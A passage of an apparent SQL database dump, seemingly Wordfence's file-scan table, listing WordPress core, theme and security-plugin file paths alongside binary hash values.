l���_7���DL�pb�Uy��=5�9��/��','',0,'?'),('��\'��|?��>��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L��aDJ�?��Z��','����=F=�=�<��_%�=��M?�����u/','',0,'?'),('�HC������)�C�','wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��K��\n�u�@�x','Aݶ�݁;_|s�Ȥ4��_�)z�aK�Q�Ee!��','',0,'?'),('��u�m�mL�jsL/�','wp-content/plugins/wp-cerber/cerber-ripe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�a���G�5.L��','�BA�i���B�\rD�y.��_�Ώ%)�X�h�\Z�','',0,'?'),('�p�խ^�@#�Ԓ','wp-content/plugins/wordfence/views/scanner/scan-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�1{�	@�m�90','�K��M$���)�+SCQF�1qZ�Tv`�r','',0,'?'),('�3^��PM�Y���H�D�','wp-includes/js/tinymce/skins/wordpress/images/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�¶��B�=\rz��3j�','���i���I/=�M�MX�:M�A�pv�\r�','',0,'?'),('�5f�����oޮ�','wp-admin/includes/class-wp-privacy-policy-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ã��6�rRӆ��',':����֎�,J-1�3��B\ZU.��g','',0,'?'),('�N�\\�|�`*�,)@4','wp-includes/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('�\\�%6J���h��@�','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Mono_400.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=����^.\0\Z�Q','Nv����EF_�[�*�G�U��Bĉ��Y�','',0,'?'),('�a�c]OVT�;� (K','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-blacklist-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nb�[�c�^��2}/��','��g\r�^� �j��L��v2���\Z���x�t','',0,'?'),('�|�p����#}��ID','wp-content/plugins/redirection/models/url/url-transform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�8�;�ulGg��h�','���1�\\�E�|{n/P�͙F,���7ļZ���U','',0,'?'),('ހ\"\0Z����2q���','wp-content/themes/newsmagbd/inc/customizer/assets/js/customizer-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0������\0иD�','�g�}]R	/7�3��cv�K�5��?�w��E','',0,'?'),('ޒ�?I�Ωi%��g�y�','wp-content/plugins/wordfence/lib/menu_dashboard_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A��~��Ԕ�T��vq','�9��FfW�rO�;�L��j�e�2��_�','',0,'?'),('ޚ�ꧭ�߅\"gс<Nr','wp-includes/blocks/text-columns/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���w��`}�N�\n��X','�t!��l�`�|*�^���0�	�l$C���;��','',0,'?'),('ޠ�q����D���b,','wp-includes/blocks/paragraph/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�o5Ё@��|pp���','$�O�6��p�簙g<EBJ�Tս~i,�����','',0,'?'),('�ދ���1F���a�','wp-content/plugins/wordfence/lib/wfArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'Fbaۆ�ₑ�1ʤ/','��n2q��8D��-�AR�>�xqYq���$� ш','',0,'?'),('��\'g!�:�H��),�','wp-includes/SimplePie/XML/Declaration/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O,@�ۺ�a�	Δ��','��im�Q�q+��\r��:�Po����\Z*�����','',0,'?'),('�CZ[}�\"\r�j�4�','wp-includes/js/dist/vendor/regenerator-runtime.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�w�\Z&�U-�','�½6b��^�\0������f��ے\n?h�','',0,'?'),('�p���́i��<%','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lY�Z�iਆ�3\02[','(��A#��F���~+���Fgh��S�.�b','',0,'?'),('���\"�����c)j�\"','wp-includes/js/wplink.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r��X��|\0LF��','��K�f��\Z���AU�i�/��\n$�H5*��','',0,'?'),('�/��i�Zج �[?�*�','wp-content/plugins/wp-cerber/assets/multi/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u���E.0�Ȁ��b[�','�]=2�����F���(Cҷ\Zc�93Є�K@','',0,'?'),('�=@\\�JpQ�m\\��6','wp-admin/includes/class-wp-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M$=�8�:����Az�n','%L���ð�@C�Ub��t�����n���c\Z�d','',0,'?'),('�=����>\0�U<�n�','wp-admin/images/about-header-freedoms.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��tM9~�߲f���+','��a��E�Vb��Ug��v�<�Rv�,vwM���','',0,'?'),('�L#�����a���W �','wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h8��\n��e�','X�y(:Չ֨Ә����o�Zty�Ɯ�_��\'','',0,'?'),('�bz�/���T�7aHy','wp-includes/js/mediaelement/mejs-controls.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^yq+�S%��y','������h���A3L�:��\'1�ꁠ�\\�','',0,'?'),('�j���X��&=��','wp-content/plugins/wp-cerber/languages/wp-cerber-zh_CN.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�=��a\0H�k','���z\n����K�I!�W?�ߤl�Uz$','',0,'?'),('�q����%ű� m+','wp-admin/css/colors/light/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7���3��-S�','9�Z�(�\"�Na\'��S�f{uK�#W�����','',0,'?'),('�r�±�2�\"}�	�,�7','wp-content/plugins/wp-cerber/assets/flags/nl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��+Z59����)|','/��\ns��!�-���?k���>��yU� �','',0,'?'),('ߌ��(������2���','wp-includes/js/quicktags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���O�@{��Π(�n','��&K� ;�h�R����&ʱ8o�v>X�','',0,'?'),('ߔ������H�u�&�','wp-includes/js/plupload/plupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݠ�$pZR�>\'�|�','�\"����8[J%�.�˚�c�V\r\rE��)\'','',0,'?'),('ߗ�Q��u�!ٶx�[','wp-includes/js/wpdialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=nR�-��KP��=��<','w���ڇEÞ����\0�v�ӭ��k^�M�n','',0,'?'),('߰S����h[�۳�','wp-includes/class-wp-http-streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oo�֪$N�~�F0�ۂ','��d�	*ȩ�X���J�z9<��)�>�ԃtj','',0,'?'),('ߴ�S8��AТ','wp-includes/js/jquery/ui/autocomplete.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':dL�*�E�&*!','��`��Or\r�8;P[Q�=�;����ܣj','',0,'?'),('߹V�=���\"�#n�	�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�-�T�\0�2�L-�','�ȴ����g�A�]�z-ۣ��᷸[�','',0,'?'),('�ĵ>��#B��b���','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۓ���G�c,��=c^�','�����G�c����t(5\n,9%�����)�e','',0,'?'),('�Ȧ0� $�7O>���','wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	��`%���{~|H�W2','�ЃJ@�Y��־[�L7Q�OX����wt�o','',0,'?'),('��g���hp��BJi4\n','wp-includes/blocks/heading/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����y��<�(�Ę�','�\rU���tJ�`�g04	n��՞F�LZ���','',0,'?'),('��Yv�z�֗*�9��a','wp-includes/js/jquery/ui/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�<Q�1}�������','�M@�jM�m��\\����`T@�.���Rl.��','',0,'?'),('��-�w��=����S','wp-includes/css/dist/edit-widgets/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^b/�ɿV%B�\0�c��','��K�1䚓�{����*��繾����\'�ԅY[','',0,'?'),('��&��=N��u�#y','wp-content/plugins/wp-cerber/assets/flags/bw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�]G��G�9�P','#�O�mT>O���://c/Pu�$0�����','',0,'?'),('�%�f\\+,���\0\\Y','wp-admin/includes/class-wp-filesystem-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5����A�Pg�}H','tܙ&>͎X�u���B�2RIe�@yJQ\Z&','',0,'?'),('�*����\'Kj��̰!c','wp-content/plugins/wordfence/waf/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P!�7G�NJ�q`.','.��\n)[.��c�f��\r�\rF��Z�k����','',0,'?'),('�=��R��`5�M:�e�','wp-content/themes/newsmagbd/assets/newsmagbd.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��n�315���i','���ߕj=�h������D�Y\nAo��G(��','',0,'?'),('�XL�t����Cc-��','wp-includes/blocks/query/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=����{#�����','?���	�?`0��i1�pL<�h�x��������','',0,'?'),('�\\1݃�%�VE|<N��','wp-content/plugins/wordfence/modules/login-security/img/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('�i���4��Zl�Ѓ @','wp-includes/css/dist/block-editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-��Er��Y�c��','m�ɧ�ِ���_�c�`�,���1\"_��5�','',0,'?'),('��r��M�ܴ-\nS��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eR��r�#�U���犏','���s�Gd��l�IB-?`7|r�R��3����V','',0,'?'),('��^��bR��SI�!�?','wp-includes/class-wp-image-editor-imagick.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_x��a���tk2','�=v�3��U�A��ߠI���	0d�','',0,'?'),('����sk�6/��н�','wp-content/plugins/wordfence/lib/wfSupportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!eZu\0z�[�O��O��<','�Q:4s-¦�\n��y���}�x�z���5�','',0,'?'),('�@��M]\"���iNJ','wp-includes/class-wp-http-requests-hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,ͣa4h��D�U�+','�5���կzV��Rt�I/�+˘H0N����\'C','',0,'?'),('�Rs�2�չ���=','wp-content/plugins/wp-cerber/admin/cerber-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MR�t�\ZL?�B[Y','�0��kkay��P�{?l2~b���t�a�ҋ','',0,'?'),('�T�T�9ܰ��\nj�~','wp-includes/blocks/query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�9�.*�?�\r��','N\rC�+�*`~\\{38��pnq��ޠ�\r7ݙ_�','',0,'?'),('�Z���(>(�1bޫ�Z�','wp-includes/js/tinymce/skins/lightgray/content.inline.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lo7�r79wA�U�E','���E���P���[���x�v1i0�h;����^J','',0,'?'),('�\\�����$�I�H��','wp-includes/js/jquery/jquery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]��u�\"<Z��\\�','VKl��-]����KC��R:�\"��칾G`jI�','',0,'?'),('�b��VE��7f��	','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NI\0�/i���~��','�����\\&��r-������J������͠#','',0,'?'),('�e����:֬p6�','wp-includes/js/dist/vendor/wp-polyfill.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��F�6W�n����L','+~�5L�|�VfƁȻ����D���(%��z','',0,'?'),('�q�@/��ꦑٞ-M�','wp-admin/network/site-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����j64�r�E�','7���H��B�ߍ�o|�$��:�KZ��i������','',0,'?'),('ᅂϖ%9����\0��D','wp-content/plugins/redirection/images/donate.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yyv:i�\n�����Cb','�y�<9�\n�v�QZB\\~Xt;���~#2x� Օ','',0,'?'),('ᕵ7\\F�|�[E����l','wp-includes/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?���Dq�\Zl܋]�','���%SC���xzg�Y3����$����)\'��\"','',0,'?'),('��a0P@�a\\x��-','wp-includes/blocks/social-link/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2t��L�\\^��\"�CV','pp&5kBo�b�N�M\nS,��Ա�^C����','',0,'?'),('�>“���\n�5����Z','wp-includes/customize/class-wp-customize-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�f��	˥�^�К','�\nu��8�\rYY��:\nVk���.aG��GoM','',0,'?'),('�5��6觙|y��`','wp-content/plugins/all-in-one-wp-security-and-firewall/images/arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G\r�6\n���4����','��!�-{��Fe�W(��=\'y�j��tm�8�','',0,'?'),('�;�Dth�E�G�>�H�','wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Γ��jN�y��8','U��AM�V\n��PWk�xu�	�	�����/�=','',0,'?'),('�ͫ�]��D́i�','wp-includes/blocks/heading/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�F����`����\\#O','jC,�U�Ma��\\kdD��wi�ۭ�','',0,'?'),('���m|�yb����','wp-includes/class-wp-recovery-mode-email-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ��Gu�n���Et','Y�ѾLP����=NL������*Π�T9�I�(','',0,'?'),('��\"�C*�����.��','wp-content/plugins/wordfence/vendor/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('��{��:��t&��0','wp-content/themes/newsmagbd/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;H)��C\Z�<u��f','�7�i��.���F�����V�h�;e4o�V/�d�','',0,'?'),('��\\9ã>���Iz4�c','wp-includes/js/tinymce/plugins/hr/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k+%�5l3�!-��','�2`���Ri�L��#e؄�4�6�g�p�o~�','',0,'?'),('���lb6���\\=','wp-content/plugins/wordfence/css/wf-adminbar.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0����\"CϷ�Tb�','h�S䘷*g�5��)!���}�Bl�N�E�','',0,'?'),('�BK���A�a<�l2','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xߓ�Œ\"X3�6DQ�','!�l.�.��GI�\n7oe�ѿ�\';I�\n\n���','',0,'?'),('�7.�8T��)��w��^','wp-content/plugins/wp-cerber/languages/wp-cerber-nl_NL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zi�Q	�4��_�','|.�=���Z��>��*d�}W�r[{,9_�','',0,'?'),('�L�>�ٟ�#{6p}Y��','wp-admin/options-writing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ì�,{J�>M*\ZY��3','�������C�I�T��H&3��8�̞n�','',0,'?'),('�U6υs�d�~x���','wp-includes/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�*�un�rdu�g���','�ҷ<h�bo�>�W��\Z�N��� e��ia�','',0,'?'),('�^}R	�V7{WI\rH','wp-includes/blocks/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��fki�p�ǖk1�','��ll%G���dBAԺ�Ԧ$˛����55AA','',0,'?'),('�y�0H�#;�e\n\"�+','wp-includes/js/dist/server-side-render.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h2�	�d�Gn)�_T`','�v�<�aRj4.�\"f{WL^Gx��3��]\'�','',0,'?'),('��Za9�U�z��ն','wp-includes/class-wp-date-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�U��	�L]-�Rs�@�','ֲP4]���!	o3\n��l���Q�0�','',0,'?'),('��ĸ:�,p�1��Hr','wp-admin/js/dashboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4v��[��r�(�','2̇�!UJ�;�D<s�˕G�V��-�x��)�','',0,'?'),('�\0��וoxi3%\r+]kg','wp-admin/images/post-formats.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K���\0���%3���','9ƺ�&�]��n�Eu��a]iF���Ƴ�','',0,'?'),('�\rSL<�8\0_��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-general-init-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ns(�y��\Z�l#�$','&���Q/�HT]���Պ�p�}��|e�ZVq9','',0,'?'),('�0�;�-,�A�Ey�','wp-includes/theme-compat/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�S��;��I��(','���U�kx�r��Lb�\"��JAF�(u;	\0�&','',0,'?'),('�B��\"^I\n���hƜ','wp-includes/js/dist/dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x����_x1V','������A+�&\r�rgDu\"i#TZ��,ߑ���','',0,'?'),('�Iie�b1o4#��b','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-database-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���j�ֺ�~�9&�','U?	��y�d��u�{m 5œ�3��>�՛�\n�\n�','',0,'?'),('�O�u�6��o�G��','wp-content/plugins/wp-cerber/assets/flags/lr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�a�!^KG�C �,�','b쁣������=Q��*���IGTG	�!]E��9','',0,'?'),('�a�Oj\'�ŻD*ցV4','wp-cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�>F�m8ɃK`�','hi��g��F���-��	0&������yl�','',0,'?'),('�m�5^���u��9>','wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(t����\r4��cR','�^�V�x���_:��k	��(��?�B�!','',0,'?'),('�#�\' �~����/z�F','wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ޜ�t�j̥<�','�������T����	?W��E>}�u���+��','',0,'?'),('�e�\\�k�c��Xf','wp-includes/customize/class-wp-customize-upload-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؓ�B8�?)ivr��`-�','�~t~��X���% ��K/3-n6\0�RB�֨G�','',0,'?'),('�Rs{p~���gЁؑ�','wp-includes/css/dist/reusable-blocks/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�J_Z�w�;���','�R�=�WA)ш���`S{.�)�u�MM�F{�','',0,'?'),('㻉�XP2\r�=�Q','wp-content/themes/newsmagbd/inc/pro/welcome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I2	�}��<ź����','a���D�@��� �*ӈF��ֱ��\"qjH','',0,'?'),('��q�82��v�&#M','wp-includes/js/tinymce/plugins/wpview/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j5q��S\rX���i��','Ej\Z��\Z�I���3J��G�jVݒ��6<S�9P','',0,'?'),('��H�����%��,��','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��%;w���Q�8��@','wi>�6�Ƭ�4��.N�C���\Z�4�IO��','',0,'?'),('���<kUJv%��1��','wp-includes/fonts/dashicons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7����|�����Z','�D��D+ve�h��s>���Z�fo��vW�~,=','',0,'?'),('��`c�@3���vz�','wp-includes/blocks/legacy-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��m\ZBh�\r$���+','{�C�&�Z���Z<؜H;UduYXr ��%;,�','',0,'?'),('���#�iJ�H�?�@�','wp-includes/class-wp-http-curl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�`3F�O�,;N#���','��@�� ����T��(�\nD�ڠ��Y��	�]�2','',0,'?'),('�w����V���!�','wp-admin/includes/class-wp-ms-themes-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�\n�G��	Yb:�','�����5��ύ���`��ʮ�z��&�}U����','',0,'?'),('�\Z�K�^���\n�','wp-includes/blocks/image/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V%΀M_�g','��=x�ޓ�[����H��Y��DW�t�r<','',0,'?'),('���o�}K�M�$','wp-content/themes/newsmagbd/inc/customizer/core/customizer-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B%+�B%��اM2','7*����{�\n���|Z��ey��7��ve','',0,'?'),('�,��*iV�O1a�\n3�','wp-includes/blocks/post-featured-image/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','펩���¨g��A��״','汻\0@R�S���g,�_\n���B.����B�','',0,'?'),('�\\/蝄W�n�-�\n� 9','wp-includes/blocks/image/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>4�~_^IR=�*>�̂6','�θ\n*�\n�H����@;ͻM�h�Z�/��','',0,'?'),('�z^}��¤hh3\r��w','wp-content/plugins/wordfence/images/options.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��Ѵ����A�','D:�bw�#^����4�B�KIP�?	z�n�V�_','',0,'?'),('䆮G*�~�5H���I','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�x��<ȃ|��+QW','��L�c�c��9�00p����$Žӥ����','',0,'?'),('�x����4���qL�','wp-content/plugins/redirection/locale/redirection-en_GB.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9�rK����[QM{�','�:FG�-�	5�\rj�}��F�8���� ��;�*','',0,'?'),('����zpKC�{\\>��','wp-admin/js/dashboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','klQ,�bh\n�3��U�a','���3S�ю\r�L�G� �g&�/!/�]ݣ�','',0,'?'),('���1�]�M|�K�FZ','wp-content/plugins/wordfence/lib/wfBulkCountries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9	+Oyծ�urO�3�\n','X&o1\'�cg��ml��yS����t�����\r','',0,'?'),('�\00��q�ĊNy)��','wp-includes/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q-�UO�R?��<(D��','�0�my�C��_�y�Z�3Z�\0�l P9�i�3i','',0,'?'),('�\'�`F̔�~�Ė��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���؍��0�+C����','`>&i(Ź���C���f���&���>Y\"�','',0,'?'),('�)�鷫��g̨R','wp-includes/blocks/loginout/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���E��$Y?�\n<�','�d�\0�s�-VT��I��5;4�|]!��%��0-;','',0,'?'),('�4����m�T曢�A','wp-content/plugins/wp-cerber/assets/flags/cx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�f��mW}}]�','db\'f-�LZ�\0g �]��_��׭\'���o','',0,'?'),('�5&$5Q���5��N�','wp-includes/js/dist/edit-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��!�;x�� t�]','���S���y��2�ڿ�o���\'�֛/TaN�7','',0,'?'),('�C�Ǵ��k�q{.L','wp-includes/js/dist/block-serialization-default-parser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6��ʜ9�Y�jbI�$','������4k�:�dȧ�!\'�{ݸ�M����h','',0,'?'),('�H��4�.\\�:��#��','wp-admin/css/l10n.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+.�[H\rϬ.k��/ ','�������lg����j-u��\\$?���)\\�y6@','',0,'?'),('�R��q� v��z\rPU','wp-content/plugins/wordfence/languages/wordfence.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0%���=X�Ӽ/��',']�%�N�8��ܠ��럷��_�;��\rD�,e��','',0,'?'),('�R��5?�- S�^H��','wp-admin/js/editor-expand.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K�\\(��p���[','���;W#�}Gj�[��K�SAKZ�iˤ[Q4c\n','',0,'?'),('�eŐ��n���A�','wp-content/plugins/wordfence/lib/wfView.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�ܺ�-ˆN\n�\\�nO','x�2Q����mk٫@IFRh�Hu~�R8�\"z�K4�','',0,'?'),('�se���Qr^T�K�','wp-includes/blocks/post-title/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7���	���+�=��','\Z_��E(��z�mc����a��œ1&-�4)','',0,'?'),('���5�1Q�?�_��','wp-includes/https-migration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s9�4W#2��!H�߾�','2�|P��Ł�muН���~k��37rz0�x�A�','',0,'?'),('嚯�W,$�q�U��','wp-content/plugins/redirection/models/redirect/redirect-filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UO8c��,Ϝdo��','��\'�QV=\n�W<5��U\0)�Լ�1-�9�','',0,'?'),('峳$� @z6�\0`��/�','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ջ}��B��H��71','��\"�beTb�$����׉�\n���~�ln��','',0,'?'),('��y�9*�I�H�h','wp-content/plugins/redirection/locale/redirection-gl_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��I�/�:��Z���','��XC�?;����x\"2C���w񟾘v����','',0,'?'),('���9n��w3�f=�B��','wp-content/plugins/redirection/actions/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' tLU?��/�}Pd`v','����w\r�߭C\0;K�\0ߏ��J,�躻�','',0,'?'),('�\r�b\\��ɍ�\Z��','wp-admin/edit-form-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����9��2\0\00��8�','�~��������@�Փ�h ���u���3��i','',0,'?'),('�vџ�H���5%','wp-includes/blocks/site-logo/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�\0��]� 